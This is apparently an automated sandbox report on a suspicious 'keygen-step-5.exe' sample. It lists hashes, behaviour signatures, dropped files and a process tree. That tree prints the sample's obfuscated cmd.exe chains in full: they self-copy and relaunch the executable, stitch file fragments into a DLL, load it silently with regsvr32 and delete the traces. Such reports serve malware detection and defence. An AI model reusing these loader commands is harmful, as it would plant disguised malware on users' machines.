Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    05-11-2024 08:20

General

  • Target

    keygen-step-5.exe

  • Size

    1.9MB

  • MD5

    3b7a3bba78f866019d4addccffcf3942

  • SHA1

    a1a467cc72b2b0b5678aed806435ab4e4f3a232e

  • SHA256

    c9022d72e11ce317a5edd37195ac5e7aac341e1df29792f04d2c181eac6dea1b

  • SHA512

    86978fd7b9f92338c6328494c00032b400ce596952df266b3123ed949ef7324708ae03927739c4686efdb89727f8e0a89147a6367bb3485290ba84ef9406c469

  • SSDEEP

    24576:q9qFtP8Q12rlO5Onp6iMsKmLYcX7Kx6BPLNtszaEvxAirQuPZY88PDR3YWff8yP0:N1clGWIiSmVOEBwzacxAir/RYBDu/3uw

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe
    "C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3012
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C typE "C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" > ..\yCLcV_JUHy~2UXJ.ExE && STaRT ..\YCLCV_JUHY~2UXJ.ExE -PdpV4tWBoTeEAefzfcz & IF ""=="" for %I IN ("C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" ) do taskkill /iM "%~NxI" -F > nUl
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2144
      • C:\Users\Admin\AppData\Local\Temp\yCLcV_JUHy~2UXJ.ExE
        ..\YCLCV_JUHY~2UXJ.ExE -PdpV4tWBoTeEAefzfcz
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /Q /C typE "C:\Users\Admin\AppData\Local\Temp\yCLcV_JUHy~2UXJ.ExE" > ..\yCLcV_JUHy~2UXJ.ExE && STaRT ..\YCLCV_JUHY~2UXJ.ExE -PdpV4tWBoTeEAefzfcz & IF "-PdpV4tWBoTeEAefzfcz "=="" for %I IN ("C:\Users\Admin\AppData\Local\Temp\yCLcV_JUHy~2UXJ.ExE" ) do taskkill /iM "%~NxI" -F > nUl
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2136
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /q /C ecHo %randoM%XyyM> S7YcxJ2.x & EcHO | seT /P = "MZ" > CepfIAXQ.8 & copY /Y /b cepfIAXQ.8 + KQTlyS.E +DPSBV.B+ P8AkH.lP + TE2K.C + 7_7S.4tB + _AqLYN6~.KN + 12UX9.H4T + S7YcxJ2.x ..\ID5A1C.7a > nUl & starT regsvr32.exe /S ..\ID5A1C.7A & dEl /q * > nuL
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2780
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" EcHO "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2840
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>CepfIAXQ.8"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2884
          • C:\Windows\SysWOW64\regsvr32.exe
            regsvr32.exe /S ..\ID5A1C.7A
            5⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1920
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /iM "keygen-step-5.exe" -F
        3⤵
        • System Location Discovery: System Language Discovery
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\7_7s.4tB

    Filesize

    77KB

    MD5

    0487f0b988b3a89a1f8c0a280d35c668

    SHA1

    9c29a470b5f0ea99105f9d25766b65e8ebdcf3d2

    SHA256

    2a84fa9c15c71cf185d1e3031a72f0d1559adf556455e0875cda55bab553b66b

    SHA512

    35c637a87883c0e4d429a19e11816b737ea05f37566ceeb22d9fd2c36ef568fb2ba699b10f23d276f640114ef3c1cc56481c0701046ad13a83fdf2693f6a35d6

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\CepfIAXQ.8

    Filesize

    2B

    MD5

    ac6ad5d9b99757c3a878f2d275ace198

    SHA1

    439baa1b33514fb81632aaf44d16a9378c5664fc

    SHA256

    9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

    SHA512

    bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\DpsBv.B

    Filesize

    428KB

    MD5

    9a66c3b6836700f26deb13b6d37aa4b6

    SHA1

    013ecc7e28dd831c89660dd8dd042e7ea3dc9d2d

    SHA256

    3ee047a4b812813f4777bac2f92a91849ab4519836076443c314ee296cba5ba9

    SHA512

    1bccc6459a8e3190b542b04a15a8820bc27bb545f891d910badca3b18bceaea34fd046b1a651558fdbfbdbb7d1a93d7fdeb3a471e0903556c7c9910b77e4dc73

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\KQTlyS.E

    Filesize

    86KB

    MD5

    f4f7afc50a289cc67f88772c2aa9c2fa

    SHA1

    4b0126fb5baa302c18334f504e03a2d4c6e9c802

    SHA256

    909f5d21d276cc1fc644dd57dcbabd4b25e02c6fc6888fafed04bb0a7ddb6fbd

    SHA512

    0f73f5426c7e467eb0c03cb385571ba5bffed78f23743269be97336b11ed96d5f339a9a1173657f83b814621dd6109d26b8ac1fdb7864ef5497ffe55474afd66

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\P8Akh.lP

    Filesize

    302KB

    MD5

    9a8e502f75614d00263a8ca83644f554

    SHA1

    1253d6b6386492c57191c6985e3643d7138cb939

    SHA256

    3dca184debb9b047947d7b4689fe4db0c520ea330f6eee8a7780433b083eb37a

    SHA512

    463ffc7f2c3d157215b64977fb60f0084884d6301c14988b37e89a4cf855df508f1e94d8fb3404f6f63711c5086e30dbb721c3489983dca786385a79bcae736f

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\_AqLYN6~.kN

    Filesize

    154KB

    MD5

    e22775ce37deb96f373634c481830799

    SHA1

    7411eb24d3c5e197627d81e20f3a4551a040c166

    SHA256

    36e2aeeceb8aa59e823f13e7bdbd6af8700ffd18f16a4d724991ecf31eb8dd6a

    SHA512

    7b42cf7339e5c0e17dca42629a7df2d732c0b13f092269508b250772f4d1c64d40dd644b4639d4e1884573526a4b0bf3f646e0e2fa585d88b0723dbd6c7affbc

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\te2K.c

    Filesize

    123KB

    MD5

    dbb25fece40a910dd4da12cf29d32392

    SHA1

    0f42f363bb3458b0bf5ff9dcd1ff9a8615baa6fd

    SHA256

    0ffc3aeb41340555ec116f4c0e0004d37de7130613b19bbb3704be551234b57d

    SHA512

    f07918a776c5f4f62b5a2ed1611aedb79eef5dc1982dd8727477f4b5c233870df6e3a82acef7691bb8d14d5f65d4919ae80351103e6e39e09b699a87748a1635

  • \Users\Admin\AppData\Local\Temp\yCLcV_JUHy~2UXJ.ExE

    Filesize

    1.9MB

    MD5

    3b7a3bba78f866019d4addccffcf3942

    SHA1

    a1a467cc72b2b0b5678aed806435ab4e4f3a232e

    SHA256

    c9022d72e11ce317a5edd37195ac5e7aac341e1df29792f04d2c181eac6dea1b

    SHA512

    86978fd7b9f92338c6328494c00032b400ce596952df266b3123ed949ef7324708ae03927739c4686efdb89727f8e0a89147a6367bb3485290ba84ef9406c469

  • memory/1920-35-0x0000000002330000-0x0000000003330000-memory.dmp

    Filesize

    16.0MB

  • memory/1920-36-0x0000000002330000-0x0000000003330000-memory.dmp

    Filesize

    16.0MB

  • memory/1920-37-0x0000000000E00000-0x0000000000EAE000-memory.dmp

    Filesize

    696KB

  • memory/1920-38-0x000000002D8E0000-0x000000002D97A000-memory.dmp

    Filesize

    616KB

  • memory/1920-41-0x000000002D8E0000-0x000000002D97A000-memory.dmp

    Filesize

    616KB

  • memory/1920-42-0x000000002D8E0000-0x000000002D97A000-memory.dmp

    Filesize

    616KB